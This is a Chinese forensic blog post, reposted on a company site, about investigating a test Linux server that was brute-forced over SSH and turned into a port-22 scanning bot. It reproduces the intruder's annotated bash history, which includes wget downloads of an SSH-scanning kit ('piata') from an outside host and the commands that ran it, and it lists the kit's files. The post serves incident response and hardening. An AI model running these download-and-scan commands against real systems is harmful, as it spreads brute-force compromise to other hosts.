2021-02-03 分類: 網(wǎng)站建設(shè)
?1、從防火墻癱瘓說(shuō)起
今天還沒(méi)到公司就被電話告知辦公室無(wú)法正常連接互聯(lián)網(wǎng)了,網(wǎng)速非常慢,無(wú)法正常瀏覽網(wǎng)頁(yè)。急急忙忙感到公司,開(kāi)始查找問(wèn)題。
首先排除了交換機(jī)故障,因?yàn)閮?nèi)部局域網(wǎng)正常。當(dāng)ping防火墻設(shè)備時(shí),丟包嚴(yán)重。很明顯,防火墻出了問(wèn)題,撐不住了,其Web管理界面根本無(wú)法正常登陸。立即聯(lián)系其服務(wù)商遠(yuǎn)程查找問(wèn)題,經(jīng)過(guò)近3個(gè)小時(shí)的分析,得出結(jié)論是網(wǎng)內(nèi)有兩臺(tái)
主機(jī)A配置如下:
- OS?-?RedHat?Enterprise?Linux?Server?release?6.x?
- 部署軟件?-?Tomcat,sshd,?oracle?
- RAM?-?8GB?
- CPU?-?Intel?Core?i3-2130?
- IP地址?-?172.16.111.22?
本文只對(duì)主機(jī)A進(jìn)行分析處理。
通過(guò)防火墻命令行界面,抓包發(fā)現(xiàn)A機(jī)器瘋狂對(duì)一組IP地址進(jìn)行22端口掃描。下面是抓包結(jié)果片段:
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22,?packet=3,?bytes=208[REPLY]?183.58.99.130:22=====>59.46.161.39:39895,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22,?packet=3,?bytes=208[REPLY]?183.58.99.131:22=====>59.46.161.39:33967,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22,?packet=3,?bytes=208[REPLY]?183.58.99.132:22=====>59.46.161.39:34117,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22,?packet=3,?bytes=208[REPLY]?183.58.99.125:22=====>59.46.161.39:54932,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22,?packet=3,?bytes=208[REPLY]?183.58.99.135:22=====>59.46.161.39:60333,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22,?packet=3,?bytes=208[REPLY]?183.58.99.136:22=====>59.46.161.39:52737,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22,?packet=3,?bytes=208[REPLY]?183.58.99.137:22=====>59.46.161.39:52291,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22,?packet=3,?bytes=208[REPLY]?183.58.99.138:22=====>59.46.161.39:46183,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22,?packet=3,?bytes=208[REPLY]?183.58.99.139:22=====>59.46.161.39:36864,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22,?packet=3,?bytes=208[REPLY]?183.58.99.133:22=====>59.46.161.39:34515,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22,?packet=3,?bytes=208[REPLY]?183.58.99.134:22=====>59.46.161.39:57121,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22,?packet=3,?bytes=208[REPLY]?183.58.99.140:22=====>59.46.161.39:37830,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22,?packet=3,?bytes=208[REPLY]?183.58.99.141:22=====>59.46.161.39:42742,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22,?packet=3,?bytes=208[REPLY]?183.58.99.142:22=====>59.46.161.39:55018,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22,?packet=3,?bytes=208[REPLY]?183.58.99.143:22=====>59.46.161.39:46447,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22,?packet=3,?bytes=208[REPLY]?183.58.99.147:22=====>59.46.161.39:51039,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22,?packet=3,?bytes=208[REPLY]?183.58.99.146:22=====>59.46.161.39:33123,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22,?packet=3,?bytes=208[REPLY]?183.58.99.151:22=====>59.46.161.39:35956,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22,?packet=3,?bytes=208[REPLY]?183.58.99.145:22=====>59.46.161.39:45002,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22,?packet=3,?bytes=208[REPLY]?183.58.99.150:22=====>59.46.161.39:54711,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22,?packet=3,?bytes=208[REPLY]?183.58.99.155:22=====>59.46.161.39:58976,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22,?packet=3,?bytes=208[REPLY]?183.58.99.157:22=====>59.46.161.39:37967,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22,?packet=3,?bytes=208[REPLY]?183.58.99.158:22=====>59.46.161.39:47125,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22,?packet=3,?bytes=208[REPLY]?183.58.99.156:22=====>59.46.161.39:35028,?packet=0,?bytes=0?
可以清晰的看到,肉雞掃描程序瘋狂掃描一個(gè)網(wǎng)段內(nèi)的22端口。
2、查找黑客行蹤的方法
對(duì)于Linux主機(jī),出現(xiàn)問(wèn)題后分析和處理的依據(jù)主要是日志。/var/log/messages、/var/log/secure都是必不可少的分析目標(biāo),然后就是.bash_history命令記錄。黑客登錄主機(jī)必然會(huì)在日志中留下記錄,高級(jí)黑客也許可以刪除痕跡,但目前大部分黑客都是利用現(xiàn)成工具的黑心者,并無(wú)太多技術(shù)背景。該主機(jī)對(duì)外開(kāi)放三個(gè)TCP偵聽(tīng)端口:
- 22?sshd?
- 80?Tomcat?
- 1521?Oracle?
這三個(gè)服務(wù)都有可能存在漏洞而被攻擊,最容易被掃描攻擊的還是sshd用戶名密碼被破解。所以最先分析 /var/log/secure日志,看登錄歷史。
3、淪陷過(guò)程分析
3.1 oracle用戶密碼被破解
分析/var/log/secure日志。不看不知道一看嚇一跳,該日志已經(jīng)占用了四個(gè)文件,每個(gè)文件都記錄了大量嘗試登錄的情況,執(zhí)行命令:
- cat?secure-20150317?|?grep?'Failed?password'?|?cut?-d?"?"?-f?9,10,11?|?sort?|?uniq?
結(jié)果如下:
- invalid?user?admin??
- invalid?user?dacx??
- invalid?user?details3??
- invalid?user?drishti??
- invalid?user?ferreluque??
- invalid?user?git??
- invalid?user?hall??
- invalid?user?jparksu??
- invalid?user?last??
- invalid?user?patrol??
- invalid?user?paul??
- invalid?user?pgadmin??
- invalid?user?postgres??
- invalid?user?public??
- invalid?user?sauser??
- invalid?user?siginspect??
- invalid?user?sql??
- invalid?user?support??
- invalid?user?sys??
- invalid?user?sysadmin??
- invalid?user?system??
- invalid?user?taz??
- invalid?user?test??
- invalid?user?tiptop??
- invalid?user?txl5460??
- invalid?user?ubnt??
- invalid?user?www??
- mysql?from?10.10.10.1??
- oracle?from?10.10.10.1??
- root?from?10.10.10.1?
可以看出攻擊程序不斷采用不同的賬戶和密碼進(jìn)行嘗試。然后在接近尾部的地方發(fā)現(xiàn)如下2行,說(shuō)明被攻破了。
- Mar?9?20:35:30?localhost?sshd[30379]:?Accepted?password?for?oracle?from?10.10.10.1?port?56906?ssh2?
- Mar?9?20:35:30?localhost?sshd[30379]:?pam_unix(sshd:session):?session?opened?for?user?oracle?by?(uid=0)?
可見(jiàn)賬戶oracle的密碼被猜中,并成功登入系統(tǒng)。
3.2 黑客動(dòng)作推演
下面看看黑客用oracle賬戶都做了什么。首先復(fù)制一份oracle的命令歷史,防止后續(xù)操作丟失該記錄。
- cp?/home/oracle/.bash_history?hacker_history?
然后查看分析這個(gè)文件。 我在后面?zhèn)渥⒘撕诳偷南敕ā?/p>
- vi?.bash_profile?
- vi?.bash_profile?(查看.bash_profile,看變量設(shè)置,把/home/oracle/bin增加到PATH)?
- ll?
- cd?/?
- vi?.bash_profile?
- vi?.bash_profile?(執(zhí)行,設(shè)置環(huán)境變量)?
- w?
- ps?x?(查看系統(tǒng)運(yùn)行進(jìn)程)?
- free?-m?(查看內(nèi)存大?。?
- uname?-a?(查看系統(tǒng)版本)?
- cat?/etc/issue?(查看系統(tǒng)發(fā)行版)?
- cat?/etc/hosts?(查看是否有網(wǎng)內(nèi)機(jī)器)?
- cat?/proc/cpuinfo?(查看CPU型號(hào))?
- cat?.bash_history?(查看oracle賬戶歷史操作)?
- w?(查看系統(tǒng)負(fù)載)?
- ls?-a?(查看/home/oracle/下的隱藏文件)?
- passwd?(修改掉oracle賬戶的密碼)?
- exit??
- ls??
- oracle?
- sqlplus?(運(yùn)行sqlplus)?
- su?(試圖切換到root賬戶)?
- app1123456?(猜測(cè)root密碼)?
- ls??
- su?-?
- w?
- free?-m?
- php?-v?(查看php版本)?
- exit?
- w?
- free?-m?
- php?-v?
- ps?aux?
- ls?-a?
- exit?
- w?
- free?-m?
- php?-v?
- cat?bash_his?(查看歷史命令)?
- cat?bash_history?
- cat?.bash_history?
- wget?scriptcoders.ucoz.com/piata.tgz?(下載肉雞攻擊軟件包)?
- tar?zxvf?piata.tgz?(解壓軟件包)?
- rm?-rf?piata.tgz?(刪除軟件包)?
- cd?piata/?(切換到攻擊軟件目錄)?
- ls?-a?
- chmod?+x?*?
- ./a?210.212?(運(yùn)行攻擊軟件)?
- screen?(試圖運(yùn)行screen命令,發(fā)現(xiàn)沒(méi)有后下載它)?
- ls?-a?
- wget?scriptcoders.ucoz.com/screen.tgz?
- tar?zxvf?screen.tgz?(解壓)?
- ./screen?
- exit?
- w?
- ps?x?
- cd?piata/?(切換到攻擊軟件目錄)?
- ls?-a?
- cat?vuln.txt?(查看攻擊結(jié)果)?
- ls?-a?
- mv?vuln.txt?1.txt?(保存攻擊結(jié)果)?
- ./screen?-r?
- nano?1.txt?(查看結(jié)果文件)?
- w?
- ps?x?
- exit?
- cd?piata?
- ps?x?
- ls?-a?
- nano?2.txt?
- exit?
- w?
- ps?x?
- cd?piata/?
- ls?-a?
- cat??
- mv?vuln.txt?2.txt?(保存結(jié)果)?
- nano?2.txt?
- w?
- ps?x?
- cd?piata/?
- ls-?a?
- cat?vuln.txt??
- rm?-rf?vuln.txt??
- ./screen?-r?
- exit?
- w?
- ps?x?
- cd?piata/?
- ls?-a?
- cat?vuln.txt??
- ls?-a?
- mv?vuln.txt?3.txt?(保存結(jié)果)?
- nano?3.txt??
- exit?
- w?
- ps?x?
- cd?piata/?
- ls?-a?
- cat?vuln.txt??
- rm?-rf?vuln.txt??
- exit?
- w?
- ps?x?
- cd?piata/?
- ls?-a?
- cat?vuln.txt??
- rm?-rf?vuln.txt??
- rm?-rf?1.txt??
- rm?-rf?2.txt?
- rm?-rf?2.txt.save??
- rm?-rf?3.txt??
- screen?-r?
- ./screen?-r?
- exit?
- w?
- ps?x?
- cd?piata/?
- ls?-a?
- cat?vuln.txt??
- ls?-a?
- nano?vuln.txt??
- rm?-rf?vuln.txt??
- screen?-r?
- ./screen?-r?
- exit?
- w?
- ps?x?
- cd?piata/?
- ls?-a?
- cat?vuln.txt??
- nano?vuln.txt??
- w?
- ls?-a?
- rm?-rf?vuln.txt??
- screen?-r?
- ./screen?-r?
- exit?
- w?
- ps?x?
- cd?piata/?
- ls?-a?
- cat?vuln.txt??
- rm?-rf?vuln.txt??
- ps?x?
- ls?-a?
- ./screen?-r?
- exit?
- w?
- ps?x?
- cd?piata/?
- ls?-a?
- cat?vuln.txt??
- nano?vuln.txt??
- w?
- rm?-rf?vuln.txt??
- ./screen?-r?
- exit?
3.3 攻擊工具一覽
前面通過(guò)命令歷史記錄,可以看出攻擊工具軟件包為名為piata。下載來(lái)看看它的面目。
- [root@localhost?piata]#?ll?
- total?1708?
- -rw-r--r--.?1?oracle?oinstall?0?Mar?10?13:01?183.63.pscan.22?
- -rwxr-xr-x.?1?oracle?oinstall?659?Feb?2?2008?a?
- -rwxr-xr-x.?1?oracle?oinstall?216?May?18?2005?auto?
- -rwxr-xr-x.?1?oracle?oinstall?283?Nov?25?2004?gen-pass.sh?
- -rwxr-xr-x.?1?oracle?oinstall?93?Apr?19?2005?go.sh?
- -rwxr-xr-x.?1?oracle?oinstall?3253?Mar?5?2007?mass?
- -rwxr-xr-x.?1?oracle?oinstall?12671?May?18?2008?pass_file?
- -rwxr-xr-x.?1?oracle?oinstall?21407?Jul?22?2004?pscan2?
- -rwxr-xr-x.?1?oracle?oinstall?249980?Feb?13?2001?screen?
- -rw-r--r--.?1?oracle?oinstall?130892?Feb?3?2010?screen.tgz?
- -rwxr-xr-x.?1?oracle?oinstall?453972?Jul?13?2004?ss?
- -rwxr-xr-x.?1?oracle?oinstall?842736?Nov?24?2004?ssh-scan?
- -rw-r--r--.?1?oracle?oinstall?2392?Mar?10?05:03?vuln.txt?
其中 a, auto, go.sh gen-pass.sh, 都是bash腳本文件,用于配置掃描網(wǎng)段,調(diào)用掃描程序。pscan2和ssh-scan則為掃描程序。 vuln.txt記錄獲得的肉雞列表。
目前尚未發(fā)現(xiàn)其他系統(tǒng)文件被黑客修改,也沒(méi)有自動(dòng)運(yùn)行攻擊軟件的設(shè)置。
4 深刻教訓(xùn)
雖然這次被攻擊的機(jī)器只是一個(gè)測(cè)試主機(jī),其本身的重要性并不高,但卻造成了防火墻的癱瘓,進(jìn)而造成互聯(lián)網(wǎng)不能正常訪問(wèn)。對(duì)此,必須引起足夠重視,并從中汲取教訓(xùn)。
系統(tǒng)賬戶密碼一定要有一定的復(fù)雜度。這次攻擊就是由于oracle賬戶密碼過(guò)于簡(jiǎn)單所致。
sshd采用密碼方式登錄風(fēng)險(xiǎn)很大,特別是密碼簡(jiǎn)單的時(shí)候??尚械那闆r下,盡量關(guān)閉密碼方式,改用公鑰方式。
作為數(shù)據(jù)中心管理員,一定要監(jiān)督監(jiān)管系統(tǒng)管理員和軟件開(kāi)發(fā)商的服務(wù)安全,本次被攻擊主機(jī)就是把所有權(quán)限都放給了網(wǎng)站開(kāi)發(fā)公司,而開(kāi)發(fā)公司對(duì)運(yùn)營(yíng)安全并不重視。
本文標(biāo)題:一次服務(wù)器淪陷為肉雞后的實(shí)戰(zhàn)排查過(guò)程!
當(dāng)前鏈接:http://jinyejixie.com/news/99009.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供手機(jī)網(wǎng)站建設(shè)、ChatGPT、網(wǎng)站營(yíng)銷、動(dòng)態(tài)網(wǎng)站、網(wǎng)站制作、域名注冊(cè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容